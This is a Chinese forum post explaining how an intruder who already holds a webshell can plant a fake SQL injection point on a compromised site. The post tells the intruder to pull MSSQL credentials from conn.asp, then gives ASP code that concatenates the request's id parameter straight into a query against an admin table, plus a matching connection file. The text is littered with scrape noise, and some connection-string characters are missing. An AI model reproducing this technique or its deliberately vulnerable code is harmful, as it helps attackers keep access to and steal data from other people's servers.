自己构造注入点方便入侵, l. ~: j& S" |9 ?2 g% Q
o- K3 d3 V L& h
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
0 k6 r3 C- ^- Y7 c7 |, M7 |
5 @! Q6 F4 V, x& t/ t这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
/ E2 M, }' q% Q; b% F, S' U( {0 o+ l9 w+ A
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
3 K7 ^* L) _% b9 H2 g2 m3 G9 Q6 L7 {! J' `. ^$ K" k
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表* F2 a3 a/ l/ S8 W: L `! J6 E1 \
/ n- i% h& c. G( z
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
8 s, o2 l; x9 ]7 T7 t. ]) {; d
7 A9 t# s* l+ u/ |程序代码" l) P. [4 r$ o- n7 {; ~8 W: g
<!--#include file="xx.asp"-->
7 D: ^8 E7 G- i$ A R<%
2 R4 c s5 c4 {$ l: Q, _set rs=server.createobject("ADODB.recordset")
0 b' L( X* m! {/ n8 n/ vid = request("id")' }- r( P. w) q
strSQL = "select * from admin where id=" & id8 t( C$ A; A8 K: U2 P, X
rs.open strSQL,conn,1,3. T$ n0 t- q) J+ E
rs.close
* b2 L, k6 \+ t% Y%>
" s. y& C/ Q# F( a* V, U8 R' @
0 B# k. @/ K) u% Y3 x- C把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在6 K6 f3 O) |/ I t3 m" ^
/ [" `* F' g- K2 F/ z; Q" d& h
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!2 Z- G4 T% T' i3 |, Z* _
2 e* r0 b+ V' F% J& r然后就要构造一个连接数据库的文件了,代码如下:
; S" O5 c7 j% o" ~ ~. z8 S程序代码
; s$ Q3 A$ c7 Z$ q* r' K1 ]<%
7 r% \" D& t3 C( i& f7 ]& q1 ~strSQLServerName = "000.000.000.000" '服务器名称或地址
1 q- l, |% I9 }strSQLDBUserName = "sqlname" '数据库帐号/ G% K8 M8 {0 W$ g
strSQLDBPassword = "sqlpass" '数据库密码
8 E' J1 M$ I3 KstrSQLDBName = "sqldataname" '数据库名称' y( a/ J1 i, R( v
Set conn = Server.CreateObject("ADODB.Connection")
a9 B1 Y0 v9 l4 c1 JstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
N2 B+ K! ^! q Dconn.open strCon
, o+ Y1 Y1 ?. C4 x%>
# ~& K. Z) D1 m* |0 J' e# K+ L' T- R5 S, f- R2 G7 N
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
?- B( F1 Q' K, r& u. {$ P: K9 [, ]2 j; l# P& a
就这样,正常情况下,就OK了,伪造成功……
, u8 D( L% f# m1 o; F' a5 R5 E& g$ l" t/ {, t. H
如果有什么问题可以提出来大家一起探讨解决。 |